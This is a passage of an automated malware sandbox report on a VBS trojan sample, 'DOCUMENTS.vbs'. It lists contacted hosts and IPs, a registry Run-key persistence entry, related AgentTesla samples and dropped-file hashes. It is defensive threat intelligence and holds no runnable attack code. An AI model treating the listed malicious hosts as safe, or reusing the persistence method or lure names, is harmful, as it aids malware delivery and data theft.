http://pesterbdd.com/images/Pester.png	DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004B33000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1569649971.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004B33000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1569649971.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://mail.topcats.com	InstallUtil.exe, 00000007.00000002.1790656213.00000000031D4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1871888281.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2715317704.000000000304E000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.microsoft.co	InstallUtil.exe, 00000012.00000002.1895434529.0000000006246000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/License	DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005A48000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005A48000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-net	DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005D51000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1623492714.0000000008E20000.00000004.08000000.00040000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://r10.o.lencr.org0#	InstallUtil.exe, 00000007.00000002.1790656213.00000000031D4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1788134621.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1866189104.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1868654537.000000000121E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1871888281.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1895434529.0000000006200000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2715317704.0000000003056000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2728548963.00000000061F0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2712754724.00000000012E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microsnq	InstallUtil.exe, 00000012.00000002.1895434529.0000000006246000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004B33000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1569649971.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting2	InstallUtil.exe, 00000012.00000002.1868654537.000000000121E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005D51000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1623492714.0000000008E20000.00000004.08000000.00040000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB	DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1826048425.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.0000000004761000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.c.lencr.org/0	InstallUtil.exe, 00000007.00000002.1790656213.00000000031D4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1788134621.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1866189104.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1868654537.000000000121E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1871888281.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1895434529.0000000006200000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2715317704.0000000003056000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2728548963.00000000061F0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2712754724.00000000012E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	InstallUtil.exe, 00000007.00000002.1790656213.00000000031D4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1788134621.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1866189104.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1868654537.000000000121E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1871888281.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1895434529.0000000006200000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2715317704.0000000003056000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2728548963.00000000061F0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2712754724.00000000012E0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/11564914/23354;	DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005D51000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1623492714.0000000008E20000.00000004.08000000.00040000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/2152978/23354	DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005D51000.00000004.00000800.00020000.00000000.sdmp, DOCUMENTS.vbs.exe, 00000004.00000002.1623492714.0000000008E20000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005A48000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	DOCUMENTS.vbs.exe, 00000004.00000002.1606369547.0000000005A48000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ip-api.com	InstallUtil.exe, 00000007.00000002.1790656213.0000000003171000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1871888281.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2715317704.0000000002FFC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://etehadshipping.com	DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.0000000004A37000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1826048425.000000000544E000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.00000000047B5000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hostingxLl	InstallUtil.exe, 00000015.00000002.2712754724.00000000012E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	DOCUMENTS.vbs.exe, 00000004.00000002.1570905081.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1790656213.0000000003171000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 0000000D.00000002.1826048425.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1871888281.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, Nwjbuywyew.vbs.exe, 00000013.00000002.1873959182.0000000004761000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2715317704.0000000002FFC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://r10.i.lencr.org/0	InstallUtil.exe, 00000007.00000002.1790656213.00000000031D4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1788134621.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1866189104.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1868654537.000000000121E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1871888281.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.1895434529.0000000006200000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2715317704.0000000003056000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2728548963.00000000061F0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2712754724.00000000012E0000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
5.144.130.41	etehadshipping.com	Iran (ISLAMIC Republic Of)	59441	HOSTIRAN-NETWORKIR	false
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	true
173.254.28.210	mail.topcats.com	United States	46606	UNIFIEDLAYER-AS-1US	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502680
Start date and time:	2024-09-02 07:47:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DOCUMENTS.vbs
Detection:	MAL
Classification:	mal100.bank.troj.spyw.evad.winVBS@24/11@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 91% Number of executed functions: 393 Number of non-executed functions: 32
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:48:00	API Interceptor	32x Sleep call for process: DOCUMENTS.vbs.exe modified
01:48:17	API Interceptor	33437x Sleep call for process: InstallUtil.exe modified
01:48:30	API Interceptor	74x Sleep call for process: Nwjbuywyew.vbs.exe modified
07:48:17	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nwjbuywyew C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs
07:48:26	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Nwjbuywyew C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
5.144.130.41	Payment-Details.scr.exe	Get hash	malicious	AgentTesla	Browse
208.95.112.1	PDF.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	Telegram.exe	Get hash	malicious	ZTrat	Browse	ip-api.com/xml/?fields=countryCode,query
	N7bEDDO8u6.exe	Get hash	malicious	Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm	Browse	ip-api.com/json/?fields=225545
	N7bEDDO8u6.exe	Get hash	malicious	Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm	Browse	ip-api.com/json/?fields=225545
	trSK2fqPeB.exe	Get hash	malicious	Amadey, RedLine, XWorm, Xmrig	Browse	ip-api.com/line/?fields=hosting
	d3d9x.dll	Get hash	malicious	Xehook Stealer	Browse	ip-api.com/json/?fields=11827
	400000.MSBuild.exe	Get hash	malicious	Xehook Stealer	Browse	ip-api.com/json/?fields=11827
	400000.MSBuild.exe	Get hash	malicious	Xehook Stealer	Browse	ip-api.com/json/?fields=11827
	INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	inv-lista de embalaje de env#U00edo 08-29.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
173.254.28.210	Transaction Notification.exe	Get hash	malicious	AgentTesla	Browse
	Payment Receipt-BOA.scr.exe	Get hash	malicious	AgentTesla	Browse
	P2P-Q-2401-001.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	PN2dMgHoX3.exe	Get hash	malicious	AgentTesla	Browse
	Payment-Swift_Copy.exe	Get hash	malicious	AgentTesla	Browse
	EX7389409837482.exe	Get hash	malicious	AgentTesla	Browse
	Delivery-Notice.exe	Get hash	malicious	AgentTesla	Browse
	Draft_Bill_Ladden.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
etehadshipping.com	Payment-Details.scr.exe	Get hash	malicious	AgentTesla	Browse	5.144.130.41
ip-api.com	https://mukulkasana0001.github.io/netflix_clone	Get hash	malicious	HTMLPhisher	Browse	51.77.64.70
	PDF.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	Telegram.exe	Get hash	malicious	ZTrat	Browse	208.95.112.1
	N7bEDDO8u6.exe	Get hash	malicious	Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm	Browse	208.95.112.1
	N7bEDDO8u6.exe	Get hash	malicious	Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm	Browse	208.95.112.1
	trSK2fqPeB.exe	Get hash	malicious	Amadey, RedLine, XWorm, Xmrig	Browse	208.95.112.1
	d3d9x.dll	Get hash	malicious	Xehook Stealer	Browse	208.95.112.1
	400000.MSBuild.exe	Get hash	malicious	Xehook Stealer	Browse	208.95.112.1
	400000.MSBuild.exe	Get hash	malicious	Xehook Stealer	Browse	208.95.112.1
	INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js	Get hash	malicious	AgentTesla	Browse	208.95.112.1
mail.topcats.com	Transaction Notification.exe	Get hash	malicious	AgentTesla	Browse	173.254.28.210
	Payment Receipt-BOA.scr.exe	Get hash	malicious	AgentTesla	Browse	173.254.28.210
	P2P-Q-2401-001.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	173.254.28.210
	PN2dMgHoX3.exe	Get hash	malicious	AgentTesla	Browse	173.254.28.210
	Payment-Swift_Copy.exe	Get hash	malicious	AgentTesla	Browse	173.254.28.210
	EX7389409837482.exe	Get hash	malicious	AgentTesla	Browse	173.254.28.210
	Delivery-Notice.exe	Get hash	malicious	AgentTesla	Browse	173.254.28.210
	Draft_Bill_Ladden.exe	Get hash	malicious	AgentTesla	Browse	173.254.28.210

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HOSTIRAN-NETWORKIR	INV20240828.exe	Get hash	malicious	FormBook	Browse	5.144.130.52
	Payment-Details.scr.exe	Get hash	malicious	AgentTesla	Browse	5.144.130.41
	rDHL_PT563857935689275783656385FV-GDS3535353.bat	Get hash	malicious	FormBook, GuLoader	Browse	185.83.114.124
	rFV-452747284IN.bat	Get hash	malicious	FormBook, GuLoader	Browse	185.83.114.124
	Shipping Docs.rdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	5.144.130.49
	PAYMENT LIST.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	5.144.130.49
	PO# CV-PO23002552.PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	5.144.130.49
	PO# CV-PO23002552.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	5.144.130.35
	Overdue Account.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	5.144.130.35
	https://hamrahansystem.com/4xe3cx/?PliaTEYmfRsh	Get hash	malicious	Unknown	Browse	45.138.134.33
TUT-ASUS	PDF.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	Telegram.exe	Get hash	malicious	ZTrat	Browse	208.95.112.1
	N7bEDDO8u6.exe	Get hash	malicious	Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm	Browse	208.95.112.1
	N7bEDDO8u6.exe	Get hash	malicious	Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm	Browse	208.95.112.1
	trSK2fqPeB.exe	Get hash	malicious	Amadey, RedLine, XWorm, Xmrig	Browse	208.95.112.1
	wfJfUGeGT3.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	208.95.112.1
	d3d9x.dll	Get hash	malicious	Xehook Stealer	Browse	208.95.112.1
	400000.MSBuild.exe	Get hash	malicious	Xehook Stealer	Browse	208.95.112.1
	400000.MSBuild.exe	Get hash	malicious	Xehook Stealer	Browse	208.95.112.1
	INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js	Get hash	malicious	AgentTesla	Browse	208.95.112.1
UNIFIEDLAYER-AS-1US	PACIFIC ARGOSY PARTICULARS.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	50.87.144.157
	SSI Brilliant - SHIP PARTICULARS.docx.scr.exe	Get hash	malicious	AgentTesla	Browse	50.87.144.157
	uDkSK3X9N7.exe	Get hash	malicious	Pony	Browse	198.57.229.120
	PI 30_08_2024.exe	Get hash	malicious	FormBook	Browse	162.241.226.190
	http://www.chacararecantodosol.com.br/wp-admin/js/milissa/swisssa2024/swisscom/index2.php	Get hash	malicious	Unknown	Browse	192.185.213.219
	https://phy.lew.mybluehost.me/wp-content/plugins/L/LM/TU17HLK/	Get hash	malicious	Unknown	Browse	50.87.169.246
	https://nexgenodisha.in/	Get hash	malicious	HTMLPhisher	Browse	192.185.76.253
	https://uaj.sa/api/aHR0cHM6Ly9nb29nbGUuY29t&sig=ZDUxNjU0ZTllNzZkYTAxNWE4OTNkZTAyM2ZkZDA1MGViMGIzY2UyOTU1MzY1NGMyNjFlOTExM2ZiMzA5MzdmMg&exp=MTcyNDIzOTUzMQ	Get hash	malicious	HTMLPhisher	Browse	192.185.79.85
	rPEDIDO.exe	Get hash	malicious	AgentTesla	Browse	173.254.29.76
	https://cvccworks-my.sharepoint.com/:o:/g/personal/tbrosseau_cvccworks_edu/Eq-UyPVcAplCp0EtULhG-vgBSBG-0YnvqRHIOFaj8gAVeA?e=0GtZle&c=E,1,DChFGbEapD80-9FdFFEzIgnps7b6noVGZQKGJYQxe5NZ1bO4xoHQSXTZoDZYFQom26YXPkpXr4g-Zcy6HwaX1DHyE-5Bk2WBwo9od82Z27DPdBWYzulyG2zvnA,,&typo=1	Get hash	malicious	HTMLPhisher	Browse	69.49.245.172

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	payment confirmation 0209243746478378774.js	Get hash	malicious	FormBook	Browse	5.144.130.41
	Awb_Shipping_Documents_BL_Invoice_pdf0000000.vbs	Get hash	malicious	Remcos, GuLoader	Browse	5.144.130.41
	SecuriteInfo.com.Win32.CrypterX-gen.29312.2664.exe	Get hash	malicious	AgentTesla	Browse	5.144.130.41
	SecuriteInfo.com.Trojan.Locsyz.2.2D0.720.21943.32020.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	5.144.130.41
	PACIFIC ARGOSY PARTICULARS.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	5.144.130.41
	SSI Brilliant - SHIP PARTICULARS.docx.scr.exe	Get hash	malicious	AgentTesla	Browse	5.144.130.41
	Quote E68-STD-094.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	5.144.130.41
	DH BL DRAFT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	5.144.130.41
	https://trk.pmifunds.com/y.z?l=http://security1.b-cdn.net&j=375634604&e=3028&p=1&t=h&D6EBE0CCEBB74CE191551D6EE653FA1E	Get hash	malicious	HTMLPhisher	Browse	5.144.130.41
	https://find-app.support/isignesp.php/	Get hash	malicious	Unknown	Browse	5.144.130.41

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\DOCUMENTS.vbs.exe	SKM_380785142007.bat	Get hash	malicious	Unknown	Browse
	CamScanner 08-28-2024 07.05.vbs	Get hash	malicious	Unknown	Browse
	Shipment Document 402402708^^^.vbs	Get hash	malicious	Unknown	Browse
	Accelya NDC SPRK Platform.vbs	Get hash	malicious	Unknown	Browse
	Accelya NDC SPRK Platform.vbs	Get hash	malicious	Unknown	Browse
	DHL-SOA_88417.bat	Get hash	malicious	AgentTesla	Browse
	SolaraBootstrapper.exe	Get hash	malicious	Unknown	Browse
	Unicredit__Copia_di_Pagamento.pdf.bat	Get hash	malicious	Remcos	Browse
	DTC.hta	Get hash	malicious	Unknown	Browse
	DHL-AIR-WAYBILL.bat	Get hash	malicious	AgentTesla	Browse
C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	SKM_380785142007.bat	Get hash	malicious	Unknown	Browse
	CamScanner 08-28-2024 07.05.vbs	Get hash	malicious	Unknown	Browse
	Shipment Document 402402708^^^.vbs	Get hash	malicious	Unknown	Browse
	Accelya NDC SPRK Platform.vbs	Get hash	malicious	Unknown	Browse
	Accelya NDC SPRK Platform.vbs	Get hash	malicious	Unknown	Browse
	DHL-SOA_88417.bat	Get hash	malicious	AgentTesla	Browse
	SolaraBootstrapper.exe	Get hash	malicious	Unknown	Browse
	Unicredit__Copia_di_Pagamento.pdf.bat	Get hash	malicious	Remcos	Browse
	DTC.hta	Get hash	malicious	Unknown	Browse
	DHL-AIR-WAYBILL.bat	Get hash	malicious	AgentTesla	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Users\user\Desktop\DOCUMENTS.vbs.exe
File Type:	data
Category:	dropped
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
SSDEEP:	192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:	106D01F562D751E62B702803895E93E0
SHA1:	CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:	81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2h1oj4qk.r42.psm1

Download File

Process:	C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a0wyl44c.bgw.psm1

Download File

Process:	C:\Users\user\Desktop\DOCUMENTS.vbs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1kdxc0y.ffv.ps1

Download File

Process:	C:\Users\user\Desktop\DOCUMENTS.vbs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f4hfn30r.nfv.ps1

Download File

Process:	C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_njty0lbc.54x.psm1

Download File

Process:	C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
